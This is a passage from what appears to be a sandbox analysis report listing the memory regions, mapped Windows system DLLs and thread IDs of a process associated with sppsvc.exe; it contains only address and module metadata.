0x7fefb940000 end_va = 0x7fefb954fff monitored = 0 entry_point = 0x7fefb941050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2014 start_va = 0x7fefb960000 end_va = 0x7fefb96bfff monitored = 0 entry_point = 0x7fefb9618a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2015 start_va = 0x7fefbc60000 end_va = 0x7fefbcaafff monitored = 0 entry_point = 0x7fefbc6efcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 2016 start_va = 0x7fefc0d0000 end_va = 0x7fefc1fbfff monitored = 0 entry_point = 0x7fefc0d94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2017 start_va = 0x7fefc740000 end_va = 0x7fefc76cfff monitored = 0 entry_point = 0x7fefc741010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2018 start_va = 0x7fefc770000 end_va = 0x7fefc905fff monitored = 0 entry_point = 0x7fefc7778e4 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 2019 start_va = 0x7fefc910000 end_va = 0x7fefc91bfff monitored = 0 entry_point = 0x7fefc911064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2020 start_va = 0x7fefc920000 end_va = 0x7fefc9dafff monitored = 0 entry_point = 0x7fefc926de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2021 start_va = 0x7fefc9e0000 end_va = 0x7fefc9e6fff monitored = 0 entry_point = 0x7fefc9e14b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 2022 start_va = 0x7fefcad0000 end_va = 0x7fefcaeafff monitored = 0 entry_point = 0x7fefcad2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2023 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2024 start_va = 0x7fefcc40000 end_va = 0x7fefcc49fff monitored = 0 entry_point = 0x7fefcc43cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 2025 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2026 start_va = 0x7fefce60000 end_va = 0x7fefcebafff monitored = 0 entry_point = 0x7fefce66940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2027 start_va = 0x7fefcfd0000 end_va = 0x7fefcfd6fff monitored = 0 entry_point = 0x7fefcfd142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 2028 start_va = 0x7fefcfe0000 end_va = 0x7fefd034fff monitored = 0 entry_point = 0x7fefcfe1054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2029 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2030 start_va = 0x7fefd190000 end_va = 0x7fefd1b1fff monitored = 0 entry_point = 0x7fefd195d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2031 start_va = 0x7fefd250000 end_va = 0x7fefd2bcfff monitored = 0 entry_point = 0x7fefd251010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2032 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2033 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2034 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2035 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2036 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2037 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2038 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2039 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2040 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2041 start_va = 0x7fefd9e0000 end_va = 0x7fefda1afff monitored = 0 entry_point = 0x7fefd9e1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2042 start_va = 0x7fefda20000 end_va = 0x7fefda55fff monitored = 0 entry_point = 0x7fefda21474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2043 start_va = 0x7fefda60000 end_va = 0x7fefda79fff monitored = 0 entry_point = 0x7fefda61558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2044 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2045 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2046 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2047 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2048 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2049 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2050 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2051 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2052 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2053 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2054 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2055 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2056 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2057 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2058 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2059 start_va = 0x7feff680000 end_va = 0x7feff856fff monitored = 0 entry_point = 0x7feff681010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2060 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2061 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2062 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 2063 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 2064 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 2065 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 2066 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 2067 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 2068 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 2069 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 2070 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 2071 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 2072 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 2073 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 2074 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 2075 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 2076 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 2077 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 2078 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2079 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2080 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2081 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2082 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2083 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2084 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2133 start_va = 0x7fef2540000 end_va = 0x7fef26bffff monitored = 0 entry_point = 0x7fef25780d0 region_type = mapped_file name = "racengn.dll" filename = "\\Windows\\System32\\RacEngn.dll" (normalized: "c:\\windows\\system32\\racengn.dll") Region: id = 2186 start_va = 0xa00000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 2187 start_va = 0x1a20000 end_va = 0x1a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a20000" filename = "" Region: id = 2188 start_va = 0xff9b0000 end_va = 0xffd0efff monitored = 0 entry_point = 0xff9fc21c region_type = mapped_file name = "sppsvc.exe" filename = "\\Windows\\System32\\sppsvc.exe" (normalized: "c:\\windows\\system32\\sppsvc.exe") Region: id = 2189 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Thread: id = 106 os_tid = 0xe00 Thread: id = 107 os_tid = 0xb20 Thread: id = 108 os_tid = 0xb18 Thread: id = 109 os_tid = 0x7a4 Thread: id = 110 os_tid = 0x54c Thread: id = 111 os_tid = 0x218 Thread: id = 112 os_tid = 0x740 Thread: id = 113 os_tid = 0x30c Thread: id = 114 os_tid = 0x794 Thread: id = 115 os_tid = 0x5fc Thread: id = 116 os_tid = 0x5f4 Thread: id = 117 os_tid = 0x5ec Thread: id = 118 os_tid = 0x558 Thread: id = 119 os_tid = 0x460 Thread: id = 120 os_tid = 0x448 Thread: id = 121 os_tid = 0x3b0 Thread: id = 122 os_tid = 0x3a8 Thread: id = 123 os_tid = 0x398 Thread: id = 124 os_tid = 0x2f8 Thread: id = 125 os_tid = 0x2f4 Thread: id = 126 os_tid = 0x2d0 Thread: id = 127 os_tid = 0x2c4 Thread: id = 128 os_tid = 0xe60 Thread: id = 131 os_tid = 0xe90 Thread: id = 137 os_tid = 0xed8 Thread: id = 141 os_tid = 0xf00 Thread: id = 147 os_tid = 0xf68 Thread: id = 149 os_tid = 0xf74 Thread: id = 150 os_tid = 0xf78 Thread: id = 154 os_tid = 0xfa0 Thread: id = 157 os_tid = 0xfb8 Thread: id = 160 os_tid = 0xfd0